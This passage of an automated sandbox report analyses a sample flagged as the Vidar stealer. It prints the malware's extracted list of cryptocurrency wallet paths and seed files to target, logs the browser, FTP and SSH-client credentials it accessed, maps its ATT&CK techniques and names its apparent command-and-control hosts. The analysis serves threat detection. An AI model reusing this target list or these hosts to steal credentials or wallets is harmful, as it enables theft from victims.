Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: MultiDoge
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Tries to harvest and steal Bitcoin Wallet information
                    Source: C:\Users\user\Desktop\bind.aspx.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\bind.aspx.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: bind.aspx.exe PID: 6376, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: bind.aspx.exe, type: SAMPLE
                    Source: Yara matchFile source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000000.1269068193.000000000035E000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: bind.aspx.exe PID: 6376, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E1307A sqlite3_transfer_bindings,4_2_61E1307A
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D5E6 sqlite3_bind_int64,4_2_61E2D5E6
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D595 sqlite3_bind_double,4_2_61E2D595
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E0B431 sqlite3_clear_bindings,4_2_61E0B431
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E037F3 sqlite3_value_frombind,4_2_61E037F3
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D781 sqlite3_bind_zeroblob64,4_2_61E2D781
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D714 sqlite3_bind_zeroblob,4_2_61E2D714
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D68C sqlite3_bind_pointer,4_2_61E2D68C
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D65B sqlite3_bind_null,4_2_61E2D65B
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D635 sqlite3_bind_int,4_2_61E2D635
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D9B0 sqlite3_bind_value,4_2_61E2D9B0
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D981 sqlite3_bind_text16,4_2_61E2D981
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D945 sqlite3_bind_text64,4_2_61E2D945
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D916 sqlite3_bind_text,4_2_61E2D916
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D8E7 sqlite3_bind_blob64,4_2_61E2D8E7
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E038CA sqlite3_bind_parameter_count,4_2_61E038CA
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E158CA sqlite3_bind_parameter_index,4_2_61E158CA
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E038DC sqlite3_bind_parameter_name,4_2_61E038DC
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61E2D8B8 sqlite3_bind_blob,4_2_61E2D8B8

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		211
                    Process Injection                    		1
                    Masquerading                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		21
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		Boot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Virtualization/Sandbox Evasion                    		1
                    Credentials in Registry                    		41
                    Security Software Discovery                    		Remote Desktop Protocol4
                    Data from Local System                    		2
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                    Process Injection                    		Security Account Manager1
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information                    		NTDS12
                    Process Discovery                    		Distributed Component Object ModelInput Capture114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets1
                    Account Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    System Owner/User Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync4
                    File and Directory Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem45
                    System Information Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    bind.aspx.exe42%ReversingLabsWin32.Trojan.Generic
                    bind.aspx.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\GCAEHDBAAECB\freebl3.dll0%ReversingLabs
                    C:\ProgramData\GCAEHDBAAECB\mozglue.dll0%ReversingLabs
                    C:\ProgramData\GCAEHDBAAECB\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\GCAEHDBAAECB\nss3.dll0%ReversingLabs
                    C:\ProgramData\GCAEHDBAAECB\softokn3.dll0%ReversingLabs
                    C:\ProgramData\GCAEHDBAAECB\vcruntime140.dll0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://player.vimeo.com0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                    https://steam.tv/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
                    https://mozilla.org0/0%URL Reputationsafe
                    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                    https://store.steampowered.com/points/shop/0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://lv.queniujq.cn0%URL Reputationsafe
                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                    https://checkout.steampowered.com/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                    https://store.steampowered.com/;0%URL Reputationsafe
                    https://store.steampowered.com/about/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
                    https://help.steampowered.com/en/0%URL Reputationsafe
                    https://store.steampowered.com/news/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
                    https://store.steampowered.com/stats/0%URL Reputationsafe
                    https://medal.tv0%URL Reputationsafe
                    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    https://login.steampowered.com/0%URL Reputationsafe
                    https://store.steampowered.com/legal/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
                    http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    steamcommunity.com
                    		104.102.49.254
                    		truetrue
                      		unknown
                      stadiatechnologies.com
                      		95.164.119.162
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://steamcommunity.com/profiles/76561199761128941true
                          		unknown
                          http://stadiatechnologies.com/true
                            		unknown
                            https://135.181.31.18/true
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
